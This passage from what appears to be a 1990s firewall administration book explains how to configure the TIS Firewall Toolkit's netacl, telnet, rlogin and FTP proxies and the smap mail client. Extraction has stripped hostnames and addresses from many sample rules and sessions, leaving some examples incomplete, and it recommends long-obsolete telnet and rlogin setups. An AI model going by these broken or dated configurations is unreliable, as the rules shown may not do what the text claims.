When an application has matched a rule, the rule is translated into whitespace delimitedstrings for later use. Typically, the application retrieves matching rules based on the first wordin the rule; the remaining words serve as parameters for that particular clause. For the smapclient and smapd server in the preceding example, the rules specify the userid to use when theapplication executes, the directory clause identifies the location of files, and the timeout clauseindicates how long the server or client will wait before assuming that the remote end is “hung.”

Special modifiers are available for each clause. For example, if the clause begins with a permit-or deny- modifier, the rule is internally flagged as granting or revoking permission for thatclause. This means that if an application retrieves all of its configuration clauses for “hosts,” thefollowing will be returned:

netacl-in.ftpd: permit-hosts -exec /usr/etc/in.ftpd netacl-in.ftpd: permit-hosts -exec /usr/etc/in.ftpd netacl-in.ftpd: deny-hosts unknown netacl-in.ftpd: deny-hosts *

Although this example may not seem clear, keep in mind that each application within theToolkit has its own unique set of clauses. The default configuration for each of theapplication’s clauses and examples are presented with the applications description.

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When assembling your netperm-table file, you might want to consider a few conventions.These conventions promote consistency in the file, and help produce a more readable andmaintainable rules list. When a hostname or host IP address is specified in the rule, matchingis performed based on whether the pattern to which the address will be matched is all digitsand decimal points, or other characters.

To better explain this process, consider this configuration rule:

netacl-in.ftpd: permit-hosts -exec /usr/etc/in.ftpd

When a connection is received and this rule is applied, the IP address of the remote machinewill be used to match this rule. If the pattern to match consists entirely of digits and decimals,matching is performed against the IP address; otherwise, it is performed against the hostname.

If the rule specifies a host- or domain name, as in the following rule

netacl-in.ftpd: permit-hosts * -exec /usr/etc/in.ftpd

then the remote system’s name is used to validate against the rule, not the IP address. Toprevent any vulnerability from DNS spoofing, it is highly recommended that the configurationrules be bound to IP addresses. When matching, asterisk wildcards are supported, with syntaxsimilar to the shell’s, matching as many characters as possible.

When the application attempts to resolve an IP address to domain name and the reverselookup fails, the hostname is set to “unknown.” Otherwise the real hostname of the remotesystem is returned. When the Domain Name resolution is performed by the firewall, a check ismade to ensure that the IP address for the DNS name returned by the reverse lookup is thesame.

This setup prevents DNS spoofing. If a hostname for this IP address cannot be located in theDNS system, the hostname is set to “unknown” and a warning is logged. This permits rules tooperate on hosts that didn’t have valid DNS mappings. This means that it is possible to allowany host in the Internet to pass through your firewall, or access certain services (or both) aslong as reverse DNS, or IN-ADDR.ARPA addressing is properly configured.

Configuring netaclnetacl is a network access control program; it provides a degree of access control for variousTCP-based services available on the server. For example, you may want to have telnet access tothe firewall for authorized users. The netacl program and the appropriate rules enable you tocreate this setup. The same capabilities are possible for any of the available services, includingftp and rlogin.

The netacl program is started through inetd; after inetd performs some checks, netacl allows ordenies the request for service from the remote user/system. When configuring the inetd.conffile for netacl, it is important to know that netacl accepts only one argument: the name of the

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service to be started. Any other arguments that are intended for the service do not go in theinetd.conf file. Consider this example:

ftp stream tcp nowait root /usr/local/etc/netacl ftpd

In this situation, when a connection request is accepted by inetd for an ftp service, the netaclprogram is started with an argument of ftpd. Before the ftpd daemon is started, the request isvalidated using the rules found in the netperm-table. The rule name for netacl consists of thekeyword netacl- followed by the name of the service. For example, if the named service is ftpd,the rule name consists of netacl-ftpd, as in the following:

netacl-ftpd: permit-hosts -exec /usr/libexec/ftpd -A -l

When you examine these two lines—the first from inetd.conf and the second from netperm-table—you can see that the command-line arguments and other information required for thedaemon is found in netperm-table.

As with all the TIS Toolkit components, arguments and descriptive keywords are permittedin the authentication clause. As seen in the preceding command output, only the host204.191.3.147 is permitted access on the firewall to run the ftpd command. It does, however,mean that FTP requests can be sent through the firewall. Table 7.2 lists various keywords thatare understood by the netacl program.

Table 7.2The netacl Rules and Clauses

Service Keyword Description

netacl permit-hosts IP Address Specifies a permission rule to allow the namedor hostname hosts. This is a list of IP addresses or hostnames.

deny-hosts IP Address Specifies a permission rule to deny the namedor hostname hosts. This is a list of IP addresses or hostnames.

The denial of service is logged via syslogd.

-exec executable [args] Specifies a program to invoke to handle theservice. This option must be the final option inthe rule. An -exec option must be present inevery rule.

-user userid userid is the numeric UID or the name from alogin in /etc/passwd that the program should usewhen it is started.

-chroot rootdir Specifies a directory to which netacl shouldchroot(2) prior to invoking the service program.This requires that the service program be present,and the pathname for the executable be relative tothe new root.

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Acceptance or rejection of the service is logged by the syslog facility. The messages printed inthe syslog files resemble those shown here:

Oct 4 00:56:12 pc netacl[339]: deny 4 01:00:20 pc netacl[354]: permit execute=/usr/libexec/ftpd

The first line in the log report indicates that the host was denied access tothe ftp service through the netacl program. The second line of output indicates that the ftprequest was accepted and allowed. Notice that the logging information only specifies theservice that was originated, and from where it originated. It does not show who the userconnected to. The sample netacl rules that follow illustrate the use of some of the parametersand clauses for netacl.

netacl-in.telnetd: permit-hosts 198.53.64.*-exec /usr/etc/in.telnetdnetacl-in.ftpd: permit-hosts unknown -exec /bin/cat /usr/local/etc/noftp.txtnetacl-in.ftpd: permit-hosts 204.191.3.* -exec /usr/etc/in.ftpdnetacl-in.ftpd: permit-hosts * -chroot /home/ftp -exec /bin/ftpd -f

In this example, netacl is configured to permit telnet only for hosts in a particular subnet.Netacl is configured to accept all FTP connections from systems that do not have a valid DNSname (“unknown”) and to invoke cat to display a file when a connection is made. Thisprovides an easy and flexible means of politely informing someone that they are not permittedto use a service. Hosts in the specified subnet are connected to the real FTP server in /usr/etc/in.ftpd but all connections from other networks are connected to a version of the FTP serverthat is already chrooted to the FTP area, effectively making all FTP activity “captive.”

Connecting with netaclWhen netacl is configured for the service that you want to provide, you should test it to ensurethat it is working. Testing requires verifying rules configured for that service to ensure thatthey are in fact operating as they should. Consider the following rules:

netacl-ftpd: permit-hosts -exec /usr/libexec/ftpd -A -l

This rule says that FTP connections will be accepted only from the host Whenthis connection is received, the ftpd server with the appropriate arguments will be started. Thiscan be evaluated by connecting to the FTP server from the authorized host, as illustrated here:

C:\ >ftp pcConnected to FTP server (Version wu-2.4(1) Fri Feb 3 11:30:22 MST 1995)ready.User ( chrish331 Password required for chrish.Password:230 User chrish logged in.ftp>

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As you can see from this output, the connection from the authorized machine to the targetsystem did in fact work. This could further be validated by examining the syslog records forthe target system where any transfers may in fact be logged. The availability of this featuredepends on the implementation of the ftpd that is in use at your site.

Another security breach you want to avoid is granting a non-authorized system a connection.To illustrate, consider the exchange:

pc# ftp pcConnected to Service not available, remote server has closed connectionftp>

The connection is initially established, but after netacl has performed verification of the rules,it finds that the host is not permitted access, and the connection is closed. On the targetsystem, a deny informational message is written to the syslog and to the console:

Oct 4 02:53:12 pc netacl[1775]: deny➥service=ftpd

In this case, the remote system received no information other than the connection has beenclosed. Meanwhile, the system administrator knows that the remote has been attempting togain access. If this occurs enough, some other action may be required against the remote user.

Such a blunt response to an unauthorized attempt to gain access might not be the mostappreciated. For this reason, you might be wise to consider a rule like the one shown here:

netacl-ftpd: permit-hosts -exec /bin/cat /usr/local/etc/noftp.txt

In this case, a user who attempts to connect from the site will not be refused aconnection; he or she will just not get what they want. With this configuration, you can logthe connection, and tell the user that he or she is not permitted access to the requested service.For example, when you attempt to connect to your server, the /usr/local/etc/noftp.txt filedisplays this response:

C:\ >ftp pcConnected to

**** ATTENTION ****

Your attempt to use this server’s FTP facility is not permitted due toorganizational security policies. Your connection attempt has been loggedand recorded.

Use of the FTP Services on this machine is restricted to specific sites.

If you believe that you are an authorized site, please contact Jon Smithat 555-1212 ext 502, or e-mail to [emailprotected].

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Connection closed by remote host.

C:\ >

Any type of message can be displayed here instead of allowing access to the requested service.This “denial” can be for system administration purposes, for example, or because of mainte-nance.

Restarting inetdRemember that after each reconfiguration of the inetd.conf file, inetd must be restarted. To dothis, you must find the Process ID or PID number for inetd and send a SIGHUP to it. Thefollowing commands are used in this process:

Signalling inetd

pc# ps -aux | grep inetdroot 1898 0.0 0.2 120 28 p3 R+ 10:46AM 0:00.02 grep inetdroot 75 0.0 1.5 140 220 ?? Is 11:19AM 0:00.25 inetdpc# kill -1 75pc#

When inetd has been signaled with the -1, or SIGHUP, it rereads the /etc/inetd.conf file andapplies the new configuration immediately.

Note You might have to send a second SIGHUP signal to inetd to make the changespermanent. Specific systems are IRIX and some versions of SunOS.

This is the most common problem that system administrators have when changing theconfiguration file. They make the change, but forget to restart inetd.

Configuring the Telnet ProxyThe telnet proxy, tn-gw, provides passthrough telnet services. In many circ*mstances, a systemadministrator may not want to allow telnet access through the firewall and either into or out ofthe private network. The telnet proxy does not provide the same type of access to the firewallhost as the netacl program. The intent behind using Telnet with netacl is to allow access to thefirewall host. With the proxy, the intent is to provide passthrough telnet with logging control.

Because of the dilemma of allowing remote administrative access and establishing a proxytelnet, it is common for the firewall administrator to run the real telnetd on a TCP port otherthan the default, and to place the proxy on the standard TCP port. This is accomplished byediting the /etc/services file and changing it to be something similar to the following:

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telnet 23/tcptelnet-a 2023/tcp

These changes are only effective after /etc/inetd.conf has been changed to reflect the configura-tion shown here:

telnet stream tcp nowait root /usr/local/etc/tn-gw tn-gwtelnet-a stream tcp nowait root /usr/local/etc/netacl telnetd

When an incoming connection is received on the telnet port with this configuration, the tn-gwapplication is started. When tn-gw receives a request, it first verifies that the requesting host ispermitted to connect to the proxy. Access to the proxy is determined by the rules established inthe netperm-table. These rules resemble those seen previously for the netacl application.However, there are application-specific parameters. The rule clauses for tn-gw are listed intable 7.3.

Table 7.3tn-gw Rules and Clauses

Option Description

userid user Specify a numeric user-id or the name of a password file entry. Ifthis value is specified, tn-gw will set its user-id before providingservice.

directory pathname Specifies a directory to which tn-gw will chroot(2) prior toproviding service.

prompt string Specifies a prompt for tn-gw to use while it is in command mode.

denial-msg filename Specifies the name of a file to display to the remote user if he or sheis denied permission to use the proxy. If this option is not set, adefault message is generated.

timeout seconds Specifies the number of seconds of idleness after which the proxyshould disconnect. Default is no timeout.

welcome-msg filename Specifies the name of a file to display as a welcome banner uponsuccessful connection. If this option is not set, a default message isgenerated.

help-msg filename Specifies the name of a file to display if the “help” command isissued. If this option is not set, a list of the internal commands isprinted.

denydest-msg filename Specifies the name of a file to display if a user attempts to connectto a remote server for which he or she is not authorized. If thisoption is not set, a default message is generated.

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authserver hostname Specifies the name or address of a system to use for network[portnumber [cipherkey]] authentication. If tn-gw is built with a compiled-in value for the

server and port, these values will be used as defaults but can beoverridden if specified in the authserver rule. If support forDES-encryption of traffic is present in the server, an optionalcipherkey can be provided to secure communications with theserver.

hosts host-pattern Rules specify host and access permissions.[host-pattern2...] [options]

The initial configuration for the tn-gw application is shown here.

tn-gw: denial-msg /usr/local/etc/tn-deny.txttn-gw: welcome-msg /usr/local/etc/tn-welcome.txttn-gw: help-msg /usr/local/etc/tn-help.txttn-gw: timeout 3600tn-gw: permit-hosts 204.191.3.* -dest * -dest !* -passok -➥xok

Note If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydest-msg clauses are missing, the connection will be dropped as soon as a request ismade for that file.

This configuration informs users when they are or are not allowed to connect to the proxyserver, and when connections are denied due to their destination. The timeout line indicateshow long the telnet connection can be idle before the firewall will terminate it. The last lineestablishes an access rule to the tn-gw application. This rule and the optional parameters arediscussed shortly. A sample connection showing the host denial message is shown as follows:

$ telnet pcConnecting to pc ...

**** ATTENTION ****

Your attempt to use this server’s telnet proxy is not permitted due toorganizational security policies. Your connection attempt has been loggedand recorded.

Use of the telnet proxy Service on this machine is restricted to specific sites.

Option Description

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If you believe that you are an authorized site, please contact Jon Smithat 555-1212 ext 502, or e-mail to [emailprotected].

Connection closed by foreign host$

If the host is permitted to converse with the tn-gw application, tn-gw enters a command loopwhere it accepts commands to connect to remote hosts. The commands available within thetn-gw shell are listed in table 7.4.

Table 7.4tn-gw Commands

Command Description

c[onnect] hostname [port] Connects to a remote host. Access to the remote host may betelnet hostname [port] denied based on a host destination

x[-gw] [display/hostname] This command invokes the X Windows gateway for a connectionto the user’s display. By default, the display name is the connect-ing machine followed by :0.0, as in The x-gwcommand is discussed later in this chapter.

help Displays a user-definable help file.?

quit Exits the gateway.exitclose

Connecting through the Telnet ProxyWhen a permitted host connects to the proxy, it is greeted by the contents of the welcomefile—configured in the tn-gw options—and by a prompt. At the prompt, tn-gw expects toreceive one of the commands listed in table 7.4. When the connect request is made, the accessrules are applied to the destination host to confirm that a connection to that host is permitted.If the connection is permitted, the connection is made. A successful connection is shown asfollows:

Welcome to the URG Firewall Telnet Proxy

Supported commands are c[onnect] hostname [port] x-gw help exit

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To report problems, please contact Network Security Services at 555-1212 orby e-mail at [emailprotected]

Enter Command>c sco.sco.comNot permitted to connect to sco.sco.comEnter Command>c nds.fonorola.netTrying port 23...

SunOS Unix (


In this output you can see that a telnet connection is established to the firewall, from whichthe tn-gw application is started. The user first attempts to contact, which isdenied. A second connection request to is then permitted. This sequence begsthe question “what’s the difference?” The answer is that host destination rules are in force.This means that a given system may be blocked through options on the host command in thetn-gw rules.

Host Access RulesThe host rules that permit and deny access to the telnet proxy can be modified by a number ofadditional options, or rules that have other host access permissions. As seen in table 7.3, thehost rules are stated:

tn-gw: deny-hosts unknowntn-gw: hosts 192.33.112.* 192.94.214.*

These statements indicate that hosts that cannot be found in the DNS domain areunknown, and therefore denied, or that hosts connecting from the network 192.33.112 and192.94.214 are allowed to connect to the proxy. Optional parameters, which begin with ahyphen, further restrict the hosts that can connect to the proxy, or where the remote host canconnect to behind the firewall.

Earlier output showed that the connect request to sco.scolcom was denied by the proxybecause the user was not permitted to connect to that host. This was configured by using therule:

tn-gw: permit-hosts 204.191.3.* -dest * -dest !* -passok -xok

This rule states that any host from the 204.191.3 network is allowed to contact any machine inthe domain, but no others. This example illustrates the -dest option, whichrestricts which hosts can be connected. The -dest parameter, described in table 7.5 with theother optional parameters, is used to specify a list of valid destinations. If no list is specified,then the user is not restricted to connecting to any host.

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Table 7.5Host Access Rules

Rule Description

-dest pattern

-dest { pattern1 pattern2 ... } Specifies a list of valid destinations. If no list is specified, alldestinations are considered valid. The -dest list is processed inorder as it appears on the options line. -dest entries precededwith a “!” character are treated as negation entries.

-auth Specifies that the proxy should require a user to authenticatewith a valid user id prior to being permitted to use the gateway.

-passok Specifies that the proxy should permit users to change theirpasswords if they are connected from the designated host. Onlyhosts on a trusted network should be permitted to changepasswords, unless token-type authenticators are distributed toall users.

The -dest options are applied in the order that they appear in the line. Consequently, in theexample used so far in this chapter, if the machine you are connecting to is, thenthe first option describing a machine in the domain is not matched. This meansthat the second destination specification is matched, which is a denial. The “!” is a negationoperator, indicates that this is not permitted. The end result is that users on the 204.191.3network can only connect to systems in the domain, and no others.

The use of an IP address instead of a domain name does not alter the rule. Before the connec-tion is permitted, the tn-gw application attempts to validate the IP address. If the returnedhost matches one of the rules, then the rule is applied. Otherwise, the connection is dropped.

Verifying the Telnet ProxyThe operation of the proxy rules can be determined by attempting a connection througheach of the rules, and verifying whether the correct files are displayed when information isrequested. For example, if a user connects to tn-gw and enters the help command, doesthe user get the requested information? Are the restricted sites in fact restricted?

This verification is accomplished by exercising each of the rules. For example, consider thefollowing rule:

tn-gw: permit-hosts 204.191.3.* -dest * -dest !*

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The operation of this rule can be easily verified, once it is clear what is being controlled. Thisrule says: “Permit any host in the 204.191.3 network to connect to any machine in domain. All connections to machines outside that domain are denied.”

This can be easily verified by using telnet to contact tn-gw and attempting to connect to a sitewithin the domain space, and then attempting to connect to any other site. If site is accessible, but no other site is, then it is safe to say that the telnet is workingas it should.

For example, consider the following rules:

tn-gw: permit-hosts 204.191.3.* -dest * -dest !* -passok -xoktn-gw: deny-hosts * -dest

If the connecting host is from the 204.191.3 network, access is granted to the proxy, but theuser can only connect to the sites in the domain. The second line says that anyhost attempting to access will be denied. Should the second line be first in thefile, access to the proxy server itself would not be permitted.

Tip When entering the rules in the netperm-table, remember to write them from least tomost specific. Or, write them in order of use, after conducting some traffic analysisto determine where the traffic is going. This can be difficult and time-consuming.

This type of configuration is advantageous because it ensures that the firewall cannot beaccessed through the proxy, and leaves the telnet server available through the netacl program,which has been configured to listen on a different port.

Even though the firewall host is not available through the proxy, it can still be accessedthrough the netacl program and the telnet server running on the alternate port.

Configuring the rlogin GatewayThe rlogin proxy provides a service similar to the telnet proxy with the exception of accessbeing provided through the rlogin service rather than telnet. Typically, access to the firewallusing rlogin would not be allowed because of the large number of problems that can occur.Consequently, the only access to the firewall host is through telnet.

Regardless, there are requirements that justify the need for an rlogin proxy service. Forexample, the rlogin service provides rules for additional authentication that allow the connec-tion to be granted without the user logging in like telnet. The process of configuring therelogin-gw rules is similar to the tn-gw application; they both support the same options. Therules that are available for the rlogin-gw service are listed and explained in table 7.6.

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Table 7.6rlogin-gw Rules and Clauses

Option Description

userid user Specifies a numeric user id or the name of apassword file entry. If this value is specified, tn-gw will set its user id before providing service.

directory pathname Specifies a directory to which tn-gw willchroot(2) prior to providing service.

prompt string Specifies a prompt for tn-gw to use while it is incommand mode.

denial-msg filename Specifies the name of a file to display to theremote user if he or she is denied permission touse the proxy. If this option is not set, a defaultmessage is generated.

timeout seconds Specifies the number of seconds the systemremains idle before the proxy disconnects.Default is no timeout.

welcome-msg filename Specifies the name of a file to display as awelcome banner after the system successfullyconnects. If this option is not set, a defaultmessage is generated.

help-msg filename Specifies the name of a file to display if the “help”command is issued. If this option is not set, a listof the internal commands is printed.

denydest-msg filename Specifies the name of a file to display if a userattempts to connect to a remote server fromwhich he or she is restricted. If this option is notset, a default message is generated.

authserver hostname [portnumber [cipherkey]] Specifies the name or address of a system to usefor network authentication. If tn-gw is built witha compiled-in value for the server and port, thesewill be used as defaults but can be overridden ifspecified on this line. If support exists for DES-encryption of traffic in the server, an optionalcipherkey can be provided to secure communica-tion with the server.

hosts host-pattern [host-pattern2...] [options] Specifies host and access permissions.

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To illustrate the use of these rules to configure the rlogin-gw service, examine these samplerules from the netperm-table file:

rlogin-gw: denial-msg /usr/local/etc/rlogin-deny.txtrlogin-gw: welcome-msg /usr/local/etc/rlogin-welcome.txtrlogin-gw: help-msg /usr/local/etc/rlogin-help.txtrlogin-gw: denydest-msg /usr/local/etc/rlogin-dest.txtrlogin-gw: timeout 3600rlogin-gw: prompt “Enter Command>”rlogin-gw: permit-hosts 204.191.3.* -dest * -dest !* -passok -xokrlogin-gw: deny-hosts * -dest

Note If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydest-msg clauses are missing, the connection will be dropped as soon as a request ismade for that file.

These rules are virtually identical to the rules used to configure the tn-gw. One exception isthat the rlogin-gw is configured to display a different message when a connection request ismade for a restricted host. The following output shows the different message for rlogin:

pc# rlogin pcWelcome to the URG Firewall Rlogin Proxy

Supported commands are c[onnect] hostname [port] x-gw help password exit

To report problems, please contact Network Security Services at 555-1212 orby e-mail at [emailprotected]

Enter Command>c


You have attempted to contact a restricted host from this rlogin proxy. Yourattempt has been recorded.

To report problems, please contact Network Security Services at 555-1212 orby e-mail at [emailprotected]

Enter Command>

Now that the proxy configuration is finished, you can move on to establishing a connection.

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Connecting through the rlogin ProxyConnecting through the rlogin proxy requires a process similar to the telnet proxy. A connec-tion is first established with the firewall host, and then the user requests a connection to theremote host. The commands supported by the rlogin proxy are the same as for the telnetproxy. The following output illustrates a successful connection to a remote host using therlogin proxy:$ rlogin pcWelcome to the URG Firewall Rlogin Proxy

Supported commands are c[onnect] hostname [port] x-gw help password exit

To report problems, please contact Network Security Services at 555-1212 orby e-mail at [emailprotected]

Enter Command>c nds.fonorola.netTrying [emailprotected]:Last login: Sun Oct 8 20:33:26 from pc.unilabs.orgSunOS Release 4.1.4 (GENERIC) #1: Wed Sep 13 19:50:02 EDT 1995You have mail.bash$

The user enters the name of the host he or she wants to connect to by using the c[onnect]command followed by the hostname. Before the connection request is made, the localusername is added to the left of the requested hostname. Consequently,



The establishment of the rlogin session to the remote host is then a matter of how the service isconfigured on that host. Remember that the name or IP address of the gateway must be in the.rhosts file because that is the machine where the connection is coming from, not the realoriginating host.

Host Access RulesHost rules that permit and deny access to the rlogin proxy can be modified by a number ofadditional options, or rules. The host rules use the following format:

rlogin-gw: deny-hosts unknownrlogin-gw: hosts 192.33.112.* 192.94.214.*

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In this example, hosts that cannot be found in the DNS domain are unknown,and therefore denied; hosts connecting from the networks 192.33.112 and 192.94.214 areallowed to connect to the proxy. The optional parameters—each begin with a hyphen—further restrict the hosts that can connect to the proxy by limiting where they can connect.

Verifying the rlogin ProxyOperation of the rlogin proxy is verified by attempting to circumvent the established rules, andchecking to see that the text from each of the configured files displays when it should display.For example, if your security policy states that only certain hosts can connect to the rloginproxy, you must test this from each of the permitted hosts, and also test the connection from afew hosts that are not permitted.

Each rule for rlogin-gw must be carefully evaluated to ensure that it is operating as it should.

Configuring the FTP GatewayThe FTP proxy allows FTP traffic through the firewall to either private or public networks.The FTP proxy executes when a connection is made to the FTP port on the firewall. Fromthere a connection could be made to the firewall, although it is not a good idea to allow FTPtraffic to the firewall on the default port. It is better to have an additional FTP server systemrunning elsewhere. A more secure setup would be to run the FTP server processes when aconnection is made to a different port. By not publishing this port number, it is harder to havean FTP session established directly on the firewall.

Remember that the FTP service is found on port 21 as stated in the /etc/services file. Tochange this, edit the /etc/services file and add a second ftp entry called ftp-a—like the telnet-athat was added earlier. Establish this ftp-a service to run on a different port, such as 2021. Thenew /etc/services file will look like:

ftp 21/tcpftp-a 2021/tcp

This new ftp-a entry only addresses part of the problem. The /etc/inetd.conf file is where theactual specification is made regarding which service is executed when a connection is made.The trick here is to configure the inetd.conf file so that when a connection is made to the ftpport, the ftp-gw application is started. When a connection is made to the ftp-a port, the realftp server is started through the netacl application:

# ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -Aftp stream tcp nowait root /usr/local/etc/ftp-gw ftp-gwftp-a stream tcp nowait root /usr/local/etc/netacl ftpd

Three entries for the FTP service are included here to illustrate a point. The first entry isuncommented out and is provided to show you how the FTP service was originally started.

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The second entry establishes a connection to the FTP proxy. The third line allows ftp connec-tions to the firewall itself. Examine the configuration of the ftp-gw proxy application first.

The ftp-gw proxy, like the other Toolkit applications, reads the lines in the netperm-table filethat start with the application name, ftp-gw. Table 7.7 lists clauses that are understood byftp-gw.

Table 7.7The ftp-gw Program Rules

Rule Description

userid user Specifies a numeric userid or the name of a password fileentry. If this value is specified, ftp-gw will set its useridbefore providing service.

directory pathname Specifies a directory to which ftp-gw will chroot(2) prior toproviding service.

denial-msg filename Specifies the name of a file to display to the remote user ifhe or she is denied permission to use the proxy. If thisoption is not set, a default message is generated. When thedenial-msg file is displayed to the remote user, each line isprefixed with the FTP codes for permission denied.

welcome-msg filename Specifies the name of a file to display as a welcome bannerupon successful connection. If this option is not set, adefault message is generated.

help-msg filename Specifies the name of a file to display if the “help” commandis issued. If this option is not set, a list of the internalcommands is printed.

denydest-msg filename Specifies the name of a file to display if a user attempts toconnect to a remote server from which he or she is re-stricted. If this option is not set, a default message isgenerated.

timeout secondsvalue Specifies the idle timeout value in seconds. When the specifiednumber of seconds elapses with no activity through the proxyserver, it will disconnect. If this value is not set, no timeout isenforced.

If these options are not used, default values are used instead. When these options are used,however, the ftp-gw rules look like this:

ftp-gw: denial-msg /usr/local/etc/ftp-deny.txtftp-gw: welcome-msg /usr/local/etc/ftp-welcome.txt

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ftp-gw: help-msg /usr/local/etc/ftp-help.txtftp-gw: timeout 3600ftp-gw: denydest-msg /usr/local/etc/ftp-badest.txt

By using the Host Access rules, you can control who has access to your private network usingftp, or to whom your internal users can connect to.

Host Access RulesThe host rules that permit and deny access to the ftp proxy can be modified by a number ofadditional options. The host rules use the format:

ftp-gw: deny-hosts unknownftp-gw: hosts 192.33.112.* 192.94.214.*

In this example, hosts that cannot be found in the DNS domain are unknown,and therefore denied; hosts connecting from the network 192.33.112 and 192.94.214 areallowed to connect to the proxy. The optional parameters—each begin with a hyphen—further restrict the hosts that can connect to the proxy by limiting where they can connect.

Like the other proxy agents, a number of options, listed in table 7.8, are available for control-ling the proxy.

Table 7.8Host Access Options

Option Description

-dest pattern Specifies a list of valid destinations. If no list is specified, all -dest-dest { pattern1 pattern2 ... } destinations are considered valid. The -dest list is processed in

the order it appears on the options line. -dest entries precededwith a “!” character are treated as negation entries.

-auth Specifies that the proxy should require a user to authenticatewith a valid userid prior to being permitted to use the gateway.

-passok Specifies that the proxy should permit users to change theirpasswords if they are connected from the designated host. Onlyhosts on a trusted network should be permitted to changepasswords, unless token-type authenticators are distributed to allusers.

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The use of an IP address instead of a domain name does not alter the rule. Before the connec-tion is permitted, the tn-gw application attempts to validate the IP address. If the returnedhost matches one of the rules, then the rule is applied. Otherwise, the connection is dropped.

Verifying the FTP ProxyVerifying the operation of the FTP proxy involves testing each of the rules and connectionpoints. For example, if you are allowing FTP sessions to originate from the private network,but deny FTP access to hosts outside the private network, then the ftp-gw rules would looklike:

ftp-gw: permit-hosts 206.116.65.* -log { retr stor }

This can only be verified by attempting to establish an FTP session from a host on the LANand going out to the public network. To prove the proper operation of the proxy, a connectionfrom the public network to a machine on the private network must be attempted. Thefollowing command sequence illustrates the use of telnet to access the firewall from a hoston the internal network:

C:\WINDOWS>ftp pc.unilabs.orgConnected to to the URG Firewall FTP Proxy220-220-To report problems, please contact Network Security Services at 555-1212 or220-by e-mail at [emailprotected] ( [emailprotected](----GATEWAY CONNECTED TO FTP server (Version A) ready.)331 Password required for chrish.Password:230 User chrish logged in.ftp>

Notice that the user was allowed access to the ftp proxy, and an FTP session was established tothe machine The converse for this rule then must also be true: any hostoutside the private network is not permitted access to the ftp proxy. The following outputillustrates this restriction:

bash$ ftp pc.unilabs.orgConnected to**** ATTENTION ****500-500-Your attempt to use this server’s ftp proxy is not permitted due to500-organizational security policies. Your connection attempt has been logged500-and recorded.500-

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500-If you believe that you are an authorized site, please contact Jon Smith500-at 555-1212 ext 502, or e-mail to [emailprotected]>

In this situation, the user on the system attempted to connect to the firewall,but because its IP address [] is not within the address space specified on theftp-gw rule, the connection is denied, and the message shown here appears. Remember thatthis message is from the denial-msg rule in the configuration file.

Connecting through the FTP ProxyEstablishing a connection through the proxy involves connecting to the ftp port and thenspecifying the host to connect to. The target specification, however, is not quite what youmight expect:

$ ftp to FTP proxy (Version V1.3) ready.User ( [emailprotected](----GATEWAY CONNECTED TO net FTP server (Version wu-2.4(1) Fri Apr 21 22:42:18 EDT 1995) ready.)

331 Guest login ok, send your complete e-mail address as password.Password:230-230- Welcome to i*internet Inc.230- Anonymous FTP Server230-230-We are currently in the process of deploying the Washington230-University Anonymous FTP Server.230-230 Guest login ok, access restrictions apply.ftp>

When establishing a connection through the proxy, you first run the ftp command andconnect to the firewall, which serves as the host. After you are connected, you must specify theusername and the site to connect to. This is done using the syntax:


After validating that the site is indeed one that is allowed, the proxy connects to the FTP serveron the remote system and starts to log in using the supplied username. The remote server thenprompts for the user’s password, and if it is correct, allows the connection.

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Allowing FTP with netacl*t is fairly common to restrict the proxy from connecting to the firewall for FTP services, butoccasionally you may need to upgrade software or change text files and messages. For thisreason, you may need to enable FTP access. This can be done using the services of netacl. Withnetacl, you can restrict what machines can connect to the firewall to specific machines withinthe local network. Consider the sample configuration entries in the following command:

netacl-ftpd: permit-hosts 204.191.3.* -exec /usr/libexec/ftpd -A -l

This entry for netacl allows systems on the 204.191.3 network to connect to the FTP serverthrough netacl. The entry also locks out all other systems, as you can see when one of themtries to access the FTP server:

ftp> open 2021Connected to Service not available, remote server has closed connectionftp>

From this message it appears that there is no server listening on port 2021, when in fact thereis. netacl does not allow the request because the IP address where the request originated doesnot match the rule established previously.

If you’re not sure whether you will ever need access for FTP services to the firewall, the safestthing to do is to not allow this type of access except when absolutely necessary. This meansthat netacl can be set up in the netperm-table file, but commented out, thereby making itunavailable. Furthermore, the proxy must be configured to prevent connections to the firewallon the FTP port.

Configuring the Sendmail Proxy: smapand smapd

Two components are used for the successful delivery of mail through the firewall: smap andsmapd. The smap agent is a client that implements a minimal version of SMTP. The smapprogram accepts messages from the network and writes them to disk for future delivery bysmapd. smap is designed to run under chroot as a non-privileged process; this setup overcomespotential security risks from privileged mailers that can be accessed from over a network.

The smapd daemon periodically scans the mail spool area maintained by smap and delivers anymessages that have been gathered and stored. Mail is delivered by sendmail, and the spool fileis deleted. If the mail cannot be delivered normally, smapd can be configured to store spooledfiles to an area for later examination.

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These two applications can share configuration information in the netperm-table file if desired.Some of the operations are different, so different steps need to be taken when configuring thetwo applications.

Installing the smap ClientThe smap client runs whenever a connection request is received on the smtp port of thefirewall. This is done by adding an entry for smtp to the /etc/inetd.conf file:

smtp stream tcp nowait root /usr/local/etc/smap smap

After /etc/inetd.conf has been updated, the inetd process must be restarted so that smapaccepts connections. This can be checked by connecting manually to the smtp port:

pc# telnet pc 25Trying to character is ‘^]’.220 SMTP/smap Ready.helo250 Charmed, Im sure.help214-Commands214-HELO MAIL RCPT DATA RSET214 NOOP QUIT HELP VRFY EXPNquit221 Closing connectionConnection closed by foreign host.pc#

As you can see, smap implements a minimal SMTP implementation, and spools the mail intothe specified spool area. In the spool directory, it may be required that an etc directory withsystem specific configuration files be installed. A recommended setup is to build smap so thatit is completely standalone—it does not depend on other libraries and will run without fail.

Configuring the smap ClientThe smap client reads its configuration from the netperm-table file by looking for the linesbeginning with smap. If the line applies to both smap and smapd, the two programs can belisted on the same line by separating them with a comma:

smap, smapd: userid 6

The rules for smap are listed in table 7.9.

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Table 7.9smap Rules

Rule Description

userid name Specify the userid under which smap should run. The name can be either aname from the password database, or a numeric userid. This userid shouldbe the same as that under which smapd runs, and should have writepermission to the spool directory.

directory pathname Specifies the spool directory where smap should store incoming messages.A chroot system call is used to irrevocably make the specified directory theroot file system for the remainder of the process.

maxbytes value Specifies the maximum size of messages to gather, in bytes. If no value isset, message sizes are limited by the amount of disk space in the spool area.

maxrecip value Specifies the maximum number of recipients allowed for any message. Thisoption is only for administrators who are worried about the more esotericdenial of service attacks.

timeout value Specifies a timeout, after which smap should exit if it has not collected amessage. If no timeout value is specified, smap will never time out aconnection.

As you can see in table 7.9, some items are common between the smap and smapd applica-tions. These similarities will be discussed later. For now, develop a configuration section forthe smap application.

